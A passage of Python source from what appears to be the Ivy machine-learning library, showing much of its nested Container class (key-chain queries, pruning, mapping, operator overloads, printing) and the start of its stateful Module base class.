# noinspection PyCompatibility
yield from value.to_iterator_keys(kc, leaf_keys_only)
else:
yield kc
def to_flat_list(self):
"""
Return flat list representation of container object.
:return: Container as flat list.
"""
return list([item for key, item in self.to_iterator()])
def from_flat_list(self, flat_list):
"""
Return new container object with the same hierarchy, but with values replaced from flat list.
:param flat_list: flat list of values to populate container with.
:type flat_list: sequence of arrays
:return: Container.
"""
new_dict = dict()
for key, value in sorted(self.items()):
if isinstance(value, Container):
new_value = value.from_flat_list(flat_list)
else:
new_value = flat_list.pop(0)
new_dict[key] = new_value
return Container(new_dict, **self._config)
def has_key(self, query_key):
"""
Determine whether container object has specified key somewhere in the nested structure
:return: Boolean
"""
has_key = False
def map_fn(x, kc):
nonlocal has_key
if query_key in kc:
has_key = True
return x
self.map(map_fn)
return has_key
def has_key_chain(self, key_chain):
"""
Determine whether container object has specified key-chain
:return: Boolean
"""
keys = re.split('[/.]', key_chain)
ret = self
for key in keys:
try:
ret = ret[key]
except KeyError:
return False
return True
def has_nans(self, include_infs=True, leafwise=False):
"""
Determine whether arrays in the container contain any nans, as well as infs or -infs if specified.
:param include_infs: Whether to include infs and -infs in the check. Default is True.
:type include_infs: bool, optional
:param leafwise: Whether to apply the check leaf-wise, and return a container of booleans. Default is False,
in which case the check is applied across the entire container, returning a single boolean.
:type leafwise: bool, optional
:return: Whether the container has any nans, applied either leafwise or across the entire container.
"""
leafwise_res = self.map(lambda x, kc: _ivy.has_nans(x, include_infs))
if leafwise:
return leafwise_res
return max([v for k, v in leafwise_res.to_iterator()])
def at_keys(self, queries, ignore_none=True, containing=False, ignore_key_errors=False):
"""
Query container object at specified keys, either as list or nested dict.
:param queries: The keys to query.
:type queries: sequence of strs or single str
:param ignore_none: Whether to ignore None input. Default is True.
:type ignore_none: bool, optional
:param containing: Whether to include keys which only contain the query substrings. Default is False.
:type containing: bool, optional
:param ignore_key_errors: Whether to ignore Key-errors when trying to access the dict. Default is False.
:type ignore_key_errors: bool, optional
:return: sub-container containing only key-chains containing the specified keys.
"""
if queries is None and ignore_none:
return self
key_chains_to_keep = list()
if isinstance(queries, str):
queries = [queries]
def map_fn(x, kc):
nonlocal key_chains_to_keep
kc_split = re.split('[/.]', kc)
for query_key in queries:
if query_key in kc_split or (containing and min([query_key in k for k in kc_split])):
key_chains_to_keep.append(kc)
return x
self.map(map_fn)
return self.at_key_chains(key_chains_to_keep, ignore_key_errors=ignore_key_errors)
def at_key_chain(self, key_chain, ignore_key_errors=False):
"""
Query container object at a specified key-chain
:return: sub-container or value at specified key chain
"""
keys = re.split('[/.]', key_chain)
ret = self
for key in keys:
try:
ret = ret[key]
except KeyError as e:
if ignore_key_errors:
return
raise e
return ret
def at_key_chains(self, key_chains, ignore_none=True, ignore_key_errors=False):
"""
Query container object at specified key-chains, either as list or nested dict.
:return: sub-container containing only the specified key chains
"""
if key_chains is None and ignore_none:
return self
if isinstance(key_chains, (list, tuple)):
return self._at_key_chains_input_as_seq(key_chains, ignore_key_errors=ignore_key_errors)
elif isinstance(key_chains, dict):
return self._at_key_chains_input_as_dict(key_chains, ignore_key_errors=ignore_key_errors)
elif isinstance(key_chains, str):
return self._at_key_chains_input_as_seq([key_chains], ignore_key_errors=ignore_key_errors)
else:
raise Exception('Invalid type for input key_chains, must either be a list, tuple, dict, or ivy.Container,'
'but found type {}'.format(type(key_chains)))
def set_at_keys(self, target_dict):
"""
Set values of container object at specified keys
:return: new container with updated value at each key
"""
return_dict = dict()
for key, val in self.items():
if key in target_dict:
return_dict[key] = target_dict[key]
elif isinstance(val, Container):
return_dict[key] = val.set_at_keys(target_dict)
else:
return_dict[key] = val
return Container(return_dict, **self._config)
def set_at_key_chain(self, key_chain, val, inplace=False):
"""
Set value of container object at a specified key-chain
:return: new container with updated value at key chain
"""
keys = re.split('[/.]', key_chain)
if inplace:
cont = self
else:
cont = self.copy()
sub_cont = cont
for key in keys[:-1]:
if key not in sub_cont:
sub_cont[key] = Container(**self._config)
sub_cont = sub_cont[key]
sub_cont[keys[-1]] = val
return cont
def overwrite_at_key_chain(self, key_chain, val, inplace=False):
"""
Overwrite value of container object at a specified key-chain
:return: new container with updated value at key chain, provided it existed before.
"""
keys = re.split('[/.]', key_chain)
if inplace:
cont = self
else:
cont = self.copy()
sub_cont = cont
for key in keys[:-1]:
if key not in sub_cont:
raise Exception('key chain must already exist in container in order to call overwrite_at_key_chain')
sub_cont = sub_cont[key]
if keys[-1] not in sub_cont:
raise Exception('key chain must already exist in container in order to call overwrite_at_key_chain')
sub_cont[keys[-1]] = val
return cont
def set_at_key_chains(self, target_dict, return_dict=None, inplace=False):
"""
Set values of container object at specified key-chains
:return: new container with updated values at the key chains
"""
if return_dict is None:
if inplace:
return_dict = self
else:
return_dict = self.copy()
for k, v in target_dict.items():
if isinstance(v, dict):
return_dict[k] = self.set_at_key_chains(v, return_dict[k], inplace)
else:
return_dict[k] = v
return Container(return_dict, **self._config)
def overwrite_at_key_chains(self, target_dict, return_dict=None, inplace=False):
"""
Overwrite values of container object at specified key-chains
:return: new container with updated values at the key chains, provided they existed before.
"""
if return_dict is None:
if inplace:
return_dict = self
else:
return_dict = self.copy()
for k, v in target_dict.items():
if k not in return_dict:
raise Exception('key chain must already exist in container in order to call overwrite_at_key_chains')
if isinstance(v, dict):
return_dict[k] = self.overwrite_at_key_chains(v, return_dict[k], inplace)
else:
return_dict[k] = v
return Container(return_dict, **self._config)
def prune_keys(self, query_keys, ignore_none=True):
"""
Recursively prune set of keys
:return: Container with key-chains containing the specified keys pruned.
"""
if query_keys is None and ignore_none:
return self
key_chains_to_prune = list()
if isinstance(query_keys, str):
query_keys = [query_keys]
def map_fn(x, kc):
nonlocal key_chains_to_prune
for query_key in query_keys:
if query_key in kc:
key_chains_to_prune.append(kc)
return x
self.map(map_fn)
return self.prune_key_chains(key_chains_to_prune)
def prune_key_chain(self, key_chain):
"""
Recursively prune chain of keys, specified as 'key1/key2/key3/...'
:return: Container with keys in key chain pruned.
"""
keys_in_chain = re.split('[/.]', key_chain)
out_dict = dict()
for key, value in sorted(self.items()):
if isinstance(value, Container):
if key == keys_in_chain[0]:
if len(keys_in_chain) == 1:
new_val = []
else:
new_val = value.prune_key_chain('/'.join(keys_in_chain[1:]))
if len(new_val) > 0:
out_dict[key] = new_val
else:
new_val = value.to_dict()
if len(new_val) > 0:
out_dict[key] = value.to_dict()
else:
if len(keys_in_chain) != 1 or key != keys_in_chain[0]:
out_dict[key] = value
return Container(out_dict, **self._config)
def prune_key_chains(self, key_chains, ignore_none=True):
"""
Recursively prune set of key chains
:return: Container with keys in the set of key chains pruned.
"""
if key_chains is None and ignore_none:
return self
if isinstance(key_chains, (list, tuple)):
return self._prune_key_chains_input_as_seq(key_chains)
elif isinstance(key_chains, dict):
return self._prune_key_chains_input_as_dict(key_chains)
elif isinstance(key_chains, str):
return self._prune_key_chains_input_as_seq([key_chains])
else:
raise Exception('Invalid type for input key_chains, must either be a list, tuple, dict, or ivy.Container,'
'but found type {}'.format(type(key_chains)))
def sort_by_key(self):
new_dict = dict()
for k, v in sorted(self.items()):
if isinstance(v, Container):
v_back = v.sort_by_key()
else:
v_back = v
new_dict[k] = v_back
return Container(new_dict, **self._config)
def restructure_keys(self, key_chain_mapping):
"""
Restructure the keys of the container.
:param key_chain_mapping: Sequence of lists/tuples of key chain mapping to apply, with original and new key
chains being the left and right terms respectively.
:type key_chain_mapping: sequence of len-2 sequences
:return: New contaienr with the key chains updated.
"""
ret_cont = self.copy()
for orig_kc, new_kc in key_chain_mapping:
if orig_kc == '':
orig_kc_val = ret_cont
ret_cont = Container(**self._config)
else:
orig_kc_val = ret_cont[orig_kc]
ret_cont = ret_cont.prune_key_chain(orig_kc)
ret_cont[new_kc] = orig_kc_val
return ret_cont
def prune_empty(self, keep_Nones=False, base=True):
"""
Recursively prunes empty keys from the container dict structure.
Returns None if the entire container is empty.
:return: Container with empty keys pruned.
"""
out_dict = dict()
for key, value in sorted(self.items()):
if isinstance(value, Container):
new_value = value.prune_empty(keep_Nones, False)
if new_value:
out_dict[key] = new_value
elif self._ivy.exists(value) or keep_Nones:
out_dict[key] = value
if len(out_dict):
return Container(out_dict, **self._config)
if base:
return Container(**self._config)
return
def prune_key_from_key_chains(self, absolute=None, containing=None):
"""
Recursively prune absolute key or key containing a certain substring from all key chains.
:param absolute: The absolute key to detect in the key chains.
:type absolute: str, optional
:param containing: A substring to check each key for, when deciding which keys to prune.
:type containing: str, optional
:return: Container with specified key or substring-containing-key from all key chains removed from the chain.
"""
if not absolute and not containing:
raise Exception('At least one of absolute or containing arguments must be specified.')
out_cont = Container(**self._config)
for key, value in sorted(self.items()):
if (absolute and key == absolute) or (containing and containing in key):
if isinstance(value, Container):
out_cont = Container.combine(out_cont, value)
else:
out_cont = value
elif isinstance(value, Container):
out_cont[key] = value.prune_key_from_key_chains(absolute, containing)
else:
out_cont[key] = value
return out_cont
def prune_keys_from_key_chains(self, absolute=None, containing=None):
"""
Recursively prune absolute keys or keys containing certain substrings from all key chains.
:param absolute: The absolute key to detect in the key chains.
:type absolute: sequence of strs, optional
:param containing: A substring to check each key for, when deciding which keys to prune.
:type containing: sequence of strs, optional
:return: Container with specified keys or substring-containing-keys from all key chains removed from the chain.
"""
if not absolute and not containing:
raise Exception('At least one of absolute or containing arguments must be specified.')
out_cont = Container(**self._config)
for key, value in sorted(self.items()):
if (absolute and key in absolute) or (containing and max([con in key for con in containing])):
if isinstance(value, Container):
out_cont = Container.combine(out_cont, value)
else:
out_cont = value
elif isinstance(value, Container):
out_cont[key] = value.prune_key_from_key_chains(absolute, containing)
else:
out_cont[key] = value
return out_cont
def copy(self):
"""
Create a copy of this container.
:return: A copy of the container
"""
return Container(self.to_dict(), **self._config)
def deep_copy(self):
"""
Create a deep copy (copying all internal tensors) of this container.
:return: A deep copy of the container
"""
return self.map(lambda x, kc: _ivy.copy_array(x) if _ivy.is_array(x) else x)
def map(self, func, key_chains=None, to_apply=True, prune_unapplied=False, key_chain=''):
"""
Apply function to all array values of container
:param func: Function to apply to each container entry
:type func: python function
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:param key_chain: Chain of keys for this dict entry
:type key_chain: str
:return: New container following the function mapped to each sub-array.
"""
return_dict = dict()
for key, value in sorted(self.items()):
this_key_chain = key if key_chain == '' else (key_chain + '/' + key)
if isinstance(value, Container):
ret = value.map(func, key_chains, to_apply, prune_unapplied, this_key_chain)
if prune_unapplied and not ret:
continue
return_dict[key] = ret
else:
if key_chains is not None:
if (this_key_chain in key_chains and not to_apply) or (
this_key_chain not in key_chains and to_apply):
if prune_unapplied:
continue
return_dict[key] = value
continue
return_dict[key] = func(value, this_key_chain)
# ToDo: find an elegant way to pass ALL configs from the current container to the new container
return Container(return_dict, **self._config)
def map_conts(self, func, key_chains=None, to_apply=True, prune_unapplied=False, include_self=True, key_chain=''):
"""
Apply function to all sub-contains in the container.
:param func: Function to apply to each sub-container
:type func: python function
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:param include_self: Whether to also apply the (possiby in-place) function to this container. Default is True.
:type include_self: bool, optional
:param key_chain: Chain of keys for this dict entry
:type key_chain: str
:return: New container following the function mapped to each sub-container.
"""
return_dict = dict()
for key, value in sorted(self.items()):
this_key_chain = key if key_chain == '' else (key_chain + '/' + key)
if isinstance(value, Container):
ret = value.map_conts(func, key_chains, to_apply, prune_unapplied, key_chain=this_key_chain)
if prune_unapplied and not ret:
continue
return_dict[key] = ret
else:
if key_chains is not None:
if (this_key_chain in key_chains and not to_apply) or (
this_key_chain not in key_chains and to_apply):
if prune_unapplied:
continue
return_dict[key] = value
continue
return_dict[key] = value
ret = Container(return_dict, **self._config)
if key_chain != '' or include_self:
return func(ret, key_chain)
return ret
def dtype(self):
"""
Return container, with all entries replaced with their data types.
:return: New datatype container
"""
return self.map(lambda x, _: self._ivy.dtype(x))
def with_entries_as_lists(self):
"""
Return container object, with each array entry in the container cast to a list
"""
def to_list(x, _=''):
try:
return self._ivy.to_list(x)
except (AttributeError, ValueError):
return x
return self.map(to_list)
def reshape_like(self, target_dict, leading_shape=None, return_cont=None):
"""
Set shapes of container entries to shapes specified by new container with the same key structure
:return: new container with values of updated shapes
"""
leading_shape = self._ivy.default(leading_shape, list())
if return_cont is None:
return_cont = self.copy()
for (_, v_shape), (k, v) in zip(target_dict.items(), return_cont.items()):
if isinstance(v_shape, dict):
return_cont[k] = self.reshape_like(v_shape, leading_shape, return_cont[k])
else:
return_cont[k] = self._ivy.reshape(v, leading_shape + list(v_shape))
return Container(return_cont, **self._config)
def create_if_absent(self, key, value, inplace=True):
"""
Add a key to the container with corresponding value, if it is not already present. otherwise, do nothing.
"""
if key in self:
return
self.set_at_key_chain(key, value, inplace)
def if_exists(self, key):
"""
Returns the sub-container at the following key if it exists, otherwise None.
"""
try:
return self[key]
except KeyError:
return
def try_kc(self, key):
"""
Tries the following key or key chain, returning self if not present.
"""
try:
return self[key]
except KeyError:
return self
def with_print_limit(self, print_limit):
return Container(self,
**{**self._config, **{'print_limit': print_limit,
'rebuild_child_containers': True}})
# noinspection PyTypeChecker
def remove_print_limit(self):
return self.with_print_limit(None)
def with_print_indent(self, print_indent):
return Container(self,
**{**self._config, **{'print_indent': print_indent,
'rebuild_child_containers': True}})
def with_print_line_spacing(self, print_line_spacing):
return Container(self,
**{**self._config, **{'print_line_spacing': print_line_spacing,
'rebuild_child_containers': True}})
# Built-ins #
# ----------#
def __repr__(self, as_repr=True):
indent_str = ' '*self._print_indent
def _align_array(array_str_in):
array_str_in_split = array_str_in.split('([')
leading_str_to_keep = array_str_in_split[0].replace('\\n', '')
indented_key_size = len(leading_str_to_keep.replace('"', '').split(': ')[0])
indented_key_str = ' '*(indented_key_size+2)
padded = False
def _pre_pad_alpha_line(str_in):
nonlocal padded
padded = True
return '\\n' + indent_str + indented_key_str + str_in
leading_str_to_keep = ', '.join([_pre_pad_alpha_line(s) if s[0].isalpha() and i != 0 else s
for i, s in enumerate(leading_str_to_keep.split(', '))])
local_indent_str = '' if padded else indent_str
leading_str = leading_str_to_keep.split('\\n')[-1].replace('"', '')
remaining_str = array_str_in_split[1]
num_extra_dims = 0
for i, char in enumerate(remaining_str):
if char != '[':
num_extra_dims = i
break
extra_indent = (len(leading_str) + 1 + num_extra_dims) * ' '
array_str_in = '(['.join([leading_str_to_keep, remaining_str])
uniform_indent_wo_overflow = array_str_in.replace('\\n[', '\n' + local_indent_str + extra_indent + '[')
uniform_indent = '\n'.join([local_indent_str + extra_indent + ' ' + s
if (s[0].isnumeric() or s[0] == '-' or s[0:3] == '...' or
max([ss in s[0:6] for ss in ['nan, ', 'inf, ']])) else
(indent_str + indented_key_str + s
if (not s[0].isspace() and s[0] != '"')
else s)
for s in uniform_indent_wo_overflow.split('\\n')])
indented = uniform_indent
# 10 dimensions is a sensible upper bound for the number in a single array
for i in range(2, 10):
indented = indented.replace(' '*(i-1) + '['*i, '['*i)
indented = '\n'.join([s for s in indented.split('\n') if bool(s) and not s.isspace()])
return indented
def _align_arrays(str_in):
chunks = str_in.split('\n' + indent_str)
aligned_array_chunks = {i: _align_array(c) for i, c in enumerate(chunks) if '\\n' in c}
chunks = [aligned_array_chunks[i] if i in aligned_array_chunks else c_orig
for i, c_orig in enumerate(chunks)]
return ('\n' + indent_str).join(chunks)
new_dict = dict()
for k, v in self.items():
if isinstance(v, Container):
# noinspection PyArgumentList
rep = v.__repr__(as_repr=False)
else:
if self._ivy.is_array(v) and len(list(v.shape)) > 0 and _ivy.exists(self._print_limit) and \
_reduce(_mul, v.shape) > self._print_limit:
rep = (type(v), "shape=", list(v.shape))
elif isinstance(v, (list, tuple)) and v and self._ivy.is_array(v[0]):
rep = ("list[{}]".format(len(v)), type(v[0]), "shape=", list(v[0].shape))
else:
rep = v
new_dict[k] = rep
if as_repr:
json_dumped_str = _align_arrays(_json.dumps(
Container(new_dict, **self._config).map(
lambda x, kc: x if _is_jsonable(x)
else _repr(x).replace(' ', '').replace(',', ', ')).to_dict(),
indent=self._print_indent))
def _add_newline(str_in):
str_in_split = str_in.split('\n')
str_split_size = len(str_in_split)
return '\n'.join([('\n'*self._print_line_spacing + ss) if i == (str_split_size-1) else ss
for i, ss in enumerate(str_in_split)])
json_dumped_str = '":'.join([_add_newline(s) for s in json_dumped_str.split('":')])
# improve tf formatting
if _ivy.framework_stack and _ivy.current_framework_str() == 'tensorflow':
json_dumped_str_split = json_dumped_str.split("\'Variable:")
json_dumped_str = json_dumped_str_split[0] + ', ' + ', '.join(["\'".join(ss.split("\'")[1:])
for ss in json_dumped_str_split[1:]])
json_dumped_str = json_dumped_str.replace(':shape', ', shape').replace(')dtype=', '), dtype=').replace(
', ),', ',),')
# make keys green
json_dumped_str_split = json_dumped_str.split('":')
split_size = len(json_dumped_str_split)
json_dumped_str =\
'":'.join([' "'.join(sub_str.split(' "')[:-1] + [termcolor.colored(sub_str.split(' "')[-1], 'green')])
if i < split_size - 1 else sub_str
for i, sub_str in enumerate(json_dumped_str_split)])
# remove quotation marks, shape tuple, and color other elements of the dict
ret = json_dumped_str.replace('"', '').replace(", 'shape=', [", " shape=[").replace(
':', termcolor.colored(':', 'magenta')).replace('{', termcolor.colored('{', 'blue')).replace(
'}', termcolor.colored('}', 'blue')).replace('shape=', termcolor.colored('shape=', 'magenta')).replace(
'device=', termcolor.colored('device=', 'magenta')).replace("<class'", "<class '").replace(
"'", "").replace('<class', '<' + termcolor.colored('class', 'blue'))
# ToDo: make the solution below more elegant
for i in range(10):
ret = ret.replace('diff_{}'.format(i), termcolor.colored('diff_{}'.format(i), 'red'))
for keyword, color in self._keyword_color_dict.items():
ret = ret.replace(keyword, termcolor.colored(keyword, color))
return ret
return new_dict
def __dir__(self):
return list(super.__dir__(self)) + list(self.keys())
def __getattr__(self, item):
try:
return dict.__getitem__(self, item)
except KeyError:
# noinspection PyUnresolvedReferences
return super.__getattr__(item)
def __setattr__(self, name, value):
if name[0] != '_':
self[name] = value
else:
super.__setattr__(self, name, value)
def _get_queue_item(self, query):
if isinstance(query, int):
queue_queries = [query]
elif isinstance(query, slice):
queue_queries = list(range(query.start, query.stop, _ivy.default(query.step, 1)))
elif isinstance(query, (list, tuple)):
queue_queries = list(range(query[0].start, query[0].stop, _ivy.default(query[0].step, 1)))
else:
raise Exception('Invalid slice type, must be one of integer, slice, or sequences of slices.')
queue_idxs = set([_np.sum(q >= self._queue_load_sizes_cum).item() for q in queue_queries])
conts = list()
for i in queue_idxs:
if i not in self._loaded_containers_from_queues:
cont = Container(self._queues[i].get(timeout=self._queue_timeout), **self._config)
if _ivy.wrapped_mode():
cont = cont.to_ivy()
self._loaded_containers_from_queues[i] = cont
else:
cont = self._loaded_containers_from_queues[i]
conts.append(cont)
combined_cont = self._container_combine_method(conts)
idx = list(queue_idxs)[0]
offset = 0 if idx == 0 else self._queue_load_sizes_cum[idx - 1]
if isinstance(query, int):
shifted_query = query - offset
elif isinstance(query, slice):
shifted_query = slice(query.start-offset, query.stop-offset, query.step)
elif isinstance(query, (list, tuple)):
shifted_query = tuple([slice(slc.start-offset, slc.stop-offset, slc.step) for slc in query])
# noinspection PyUnboundLocalVariable
return combined_cont[shifted_query]
def __getitem__(self, query):
"""
Get slice, key or key chain of container object.
:param query: slice object, key or key chain to query all container elements.
:type query: slice or str
:return: Container object at desired query.
"""
if isinstance(query, str):
if '/' in query or '.' in query:
return self.at_key_chain(query)
return dict.__getitem__(self, query)
elif _ivy.exists(self._queues):
return self._get_queue_item(query)
return_dict = dict()
for key, value in sorted(self.items()):
if isinstance(value, Container):
return_dict[key] = value[query]
else:
# noinspection PyBroadException
if isinstance(value, list) or isinstance(value, tuple):
if len(value) == 0:
return_dict[key] = value
else:
return_dict[key] = value[query]
elif value is None or hasattr(value, 'shape') and value.shape == ():
return_dict[key] = value
else:
return_dict[key] = value[query]
return Container(return_dict, **self._config)
def __setitem__(self, query, val):
"""
Set key or key chain of container object.
:param query: slice object, key or key chain at which to set all container elements.
:type query: slice or str
:param val: The value to set at the desired query.
:type val: ivy.Container, array, or other
:return: New container after updating.
"""
if isinstance(query, str) and ('/' in query or '.' in query):
return self.set_at_key_chain(query, val, inplace=True)
else:
return dict.__setitem__(self, query, val)
def __contains__(self, key):
if isinstance(key, str) and ('/' in key or '.' in key):
return self.has_key_chain(key)
else:
return dict.__contains__(self, key)
def __pos__(self):
return self
def __neg__(self):
return self.map(lambda x, kc: -x)
def __pow__(self, power):
if isinstance(power, Container):
return self.reduce([self, power], lambda x: _reduce(_pow, x))
return self.map(lambda x, kc: x ** power)
def __rpow__(self, power):
return self.map(lambda x, kc: power ** x)
def __add__(self, other):
if isinstance(other, Container):
return self.reduce([self, other], sum)
return self.map(lambda x, kc: x + other)
def __radd__(self, other):
return self + other
def __sub__(self, other):
if isinstance(other, Container):
return self.reduce([self, -other], sum)
return self.map(lambda x, kc: x - other)
def __rsub__(self, other):
return -self + other
def __mul__(self, other):
if isinstance(other, Container):
return self.reduce([self, other], lambda x: _reduce(_mul, x))
return self.map(lambda x, kc: x * other)
def __rmul__(self, other):
return self * other
def __truediv__(self, other):
if isinstance(other, Container):
return self.reduce([self, other], lambda x: _reduce(_truediv, x))
return self.map(lambda x, kc: x / other)
def __rtruediv__(self, other):
return self.map(lambda x, kc: other / x)
def __floordiv__(self, other):
if isinstance(other, Container):
return self.reduce([self, other], lambda x: _reduce(_floordiv, x))
return self.map(lambda x, kc: x // other)
def __rfloordiv__(self, other):
return self.map(lambda x, kc: other // x)
def __abs__(self):
return self.map(lambda x, kc: self._ivy.abs(x))
def __lt__(self, other):
if isinstance(other, Container):
return self.reduce([self, other], lambda x: _reduce(_lt, x))
return self.map(lambda x, kc: x < other)
def __le__(self, other):
if isinstance(other, Container):
return self.reduce([self, other], lambda x: _reduce(_le, x))
return self.map(lambda x, kc: x <= other)
def __eq__(self, other):
if isinstance(other, Container):
return self.reduce([self, other], lambda x: _reduce(_eq, x))
return self.map(lambda x, kc: x == other)
def __ne__(self, other):
if isinstance(other, Container):
return self.reduce([self, other], lambda x: _reduce(_ne, x))
return self.map(lambda x, kc: x != other)
def __gt__(self, other):
if isinstance(other, Container):
return self.reduce([self, other], lambda x: _reduce(_gt, x))
return self.map(lambda x, kc: x > other)
def __ge__(self, other):
if isinstance(other, Container):
return self.reduce([self, other], lambda x: _reduce(_ge, x))
return self.map(lambda x, kc: x >= other)
def __and__(self, other):
if isinstance(other, Container):
return self.reduce([self, other], lambda x: x[0] and x[1])
return self.map(lambda x, kc: x and other)
def __rand__(self, other):
return self.map(lambda x, kc: other and x)
def __or__(self, other):
if isinstance(other, Container):
return self.reduce([self, other], lambda x: x[0] or x[1])
return self.map(lambda x, kc: x or other)
def __ror__(self, other):
return self.map(lambda x, kc: other or x)
def __invert__(self):
return self.map(lambda x, kc: _not(x))
def __xor__(self, other):
if isinstance(other, Container):
return self.reduce([self, other], lambda x: x[0] != x[1])
return self.map(lambda x, kc: x != other)
def __rxor__(self, other):
return self.map(lambda x, kc: other != x)
# Getters and Setters #
# --------------------#
# private
@property
def _ivy(self):
return _ivy.default(self._local_ivy, _ivy)
@_ivy.setter
def _ivy(self, local_ivy):
self._local_ivy = local_ivy
# public
@property
def shape(self):
"""
The shape of the arrays in the container, with None placed in indices which are not consistent across arrays
"""
return self._get_shape()
@property
def shapes(self):
"""
The shapes of each array in the container, with None placed in leaf entries without a shape attribute.
"""
return self._get_shapes()
@property
def dev_str(self):
"""
The device to which the arrays in the container belong, with None returned if the devices are not consistent
"""
return self._get_dev_str()
@property
def ivy(self):
return self._ivy
@property
def config(self):
return self._config
class MultiDevContainer(Container):
def __init__(self, dict_in, dev_strs, queues=None, queue_load_sizes=None, container_combine_method='list_join',
queue_timeout=None, print_limit=10, print_indent=4, print_line_spacing=0, ivyh=None,
keyword_color_dict=None, rebuild_child_containers=False, **kwargs):
super().__init__(dict_in, queues, queue_load_sizes, container_combine_method, queue_timeout, print_limit,
print_indent, print_line_spacing, ivyh, keyword_color_dict, rebuild_child_containers, **kwargs)
self._dev_strs = dev_strs
self._num_devs = len(dev_strs)
def at_dev(self, dev_str):
return self.map(lambda x, kc: x[dev_str] if isinstance(x, _ivy.MultiDevItem) else x)
def at_devs(self):
return {ds: self.at_dev(ds) for ds in self._dev_strs}
```
#### File: ivy/neural_net_stateful/module.py
```python
import os
import abc
# local
import ivy
from ivy.core.container import Container
# Base #
# -----#
class Module(abc.ABC):
def __init__(self, dev_str=None, v=None, build_mode='on_init', compile_on_first_call=False, store_vars=True,
stateful=None, arg_stateful_idxs=None, kwarg_stateful_idxs=None, fallback_to_non_compiled=True,
dev_strs=None):
"""
Initialze Ivy layer, which is a stateful object consisting of trainable variables.
:param dev_str: device on which to create the module's variables 'cuda:0', 'cuda:1', 'cpu' etc.
:type dev_str: str, optional
:param v: Ivy container of trainable variables. Created internally by default.
:type v: ivy container, optional
:param build_mode: How the Module is built, either on initialization (now), explicitly by the user by calling
build(), or the first time the __call__ method is run. Default is on initialization.
:type build_mode: str, optional
:param compile_on_first_call: Whether to compile the network on the first forward pass. Default is False.
:type compile_on_first_call: bool, optional
:param store_vars: Whether or not to store the variables created. Default is True.
:type store_vars: bool, optional
:param stateful: The constant id stateful items to track as part of the forward pass.
Used when graph compiling, default is None.
:type stateful: seq of any, optional
:param arg_stateful_idxs: The nested argument indices of stateful items to track as part of the forward pass.
Used when graph compiling, default is None.
:type arg_stateful_idxs: seq of any, optional
:param kwarg_stateful_idxs: The nested keyword argument indices of stateful items to track as part of the
forward pass. Used when graph compiling, default is None.
:type kwarg_stateful_idxs: seq of any, optional
:param fallback_to_non_compiled: Whether to fall back to non-compiled forward call in the case that an error is
raised during the compiled forward pass. Default is True.
:type fallback_to_non_compiled: bool, optional
:param dev_strs: devices on which to distribute the module's variables 'cuda:0', 'cuda:1', 'cpu' etc.
:type dev_strs: sequence of str, optional
:type build_mode: str, optional
"""
valid_build_modes = ['on_init', 'explicit', 'on_call']
if build_mode not in valid_build_modes:
raise Exception('build_mode must be one of {} of type str, but found {} of type{}'.format(
valid_build_modes, build_mode, type(build_mode)))
self._dev_str = ivy.default(dev_str, ivy.default(lambda: dev_strs[0], ivy.default_device(), True))
self._dev_strs = ivy.default(dev_strs, [self._dev_str])
self._build_mode = build_mode
self._stateful = stateful
self._arg_stateful_idxs = arg_stateful_idxs
self._kwarg_stateful_idxs = kwarg_stateful_idxs
self._fallback_to_non_compiled = fallback_to_non_compiled
self._store_vars = store_vars
self._built = False
self._compiled = False
self._compiled_fn = None
self._compile_on_first_call = compile_on_first_call
self._v_in = v
self.v = v
if build_mode != 'on_init':
return
self.build()
# Private #
# --------#
def _fn_with_var_arg(self, fn, v_fn):
def new_fn(*a, with_grads=True, **kw):
if 'v' in kw.keys():
del kw['v']
v = v_fn(self.v)
if not with_grads:
v = v.stop_gradients()
return fn(*a, **kw, v=v)
new_fn.wrapped = True
return new_fn
def _find_variables(self, obj=None):
vs = Container()
# ToDo: add support for finding local variables, when JAX supports uniquely flagging variables
if isinstance(obj, Module) and obj is not self:
return obj.v
elif isinstance(obj, (list, tuple)):
for i, v in enumerate(obj):
ret = self._find_variables(v)
if ret:
vs['v' + str(i)] = ret
return vs
elif isinstance(obj, dict):
for k, v in obj.items():
ret = self._find_variables(v)
if ret:
vs[k[1:] if k[0] == '_' else k] = ret
return vs
elif not hasattr(obj, '__dict__'):
return vs
for k, v in obj.__dict__.items():
if v is not None and k[0:2] != '__':
ret = self._find_variables(v)
if ret:
vs[k[1:] if k[0] == '_' else k] = ret
return vs
@staticmethod
def _extract_v(v, keychain_mappings, orig_key_chain):
if v.has_key_chain(orig_key_chain):
ret_cont = v.at_key_chain(orig_key_chain)
else:
ret_cont = ivy.Container({})
for old_kc, new_kc in keychain_mappings.items():
if orig_key_chain in old_kc:
ret_cont = ret_cont.set_at_key_chain('/'.join(new_kc.split('/')[1:]), v.at_key_chain(new_kc))
return ret_cont
def _wrap_call_methods(self, keychain_mappings, key='', obj=None):
if isinstance(obj, Module) and obj is not self:
orig_key_chain = key[1:] if key[0] == '_' else key
obj.__call__ = self._fn_with_var_arg(obj.__call__,
lambda v_: self._extract_v(v_, keychain_mappings, orig_key_chain))
return
elif isinstance(obj, (list, tuple)):
for i, val in enumerate(obj):
self._wrap_call_methods(keychain_mappings, key + '/v' + str(i), val)
return
elif isinstance(obj, dict):
for k, val in obj.items():
k = (key + '/' + k) if key != '' else k
self._wrap_call_methods(keychain_mappings, k, val)
return
if not hasattr(obj, '__dict__'):
return
for k, val in obj.__dict__.items():
if k[0:2] == '__':
continue
k = (key + '/' + k) if key != '' else k
if val is not None:
self._wrap_call_methods(keychain_mappings, k, val)
return
@staticmethod
def _remove_duplicate_variables(vs):
vs_ids = vs.map(lambda x, kc: id(x))
ids = dict()
duplicate_keychains = list()
keychain_mappings = dict()
def unique_callback(x, kc):
ids[x] = kc
def found_dup_callback(x, kc):
duplicate_keychains.append(kc)
keychain_mappings[kc] = ids[x]
vs_ids.map(lambda x, kc: unique_callback(x, kc) if x not in ids else found_dup_callback(x, kc))
for dup_kc in duplicate_keychains:
vs = vs.prune_key_chain(dup_kc)
return vs, keychain_mappings
# Overridable #
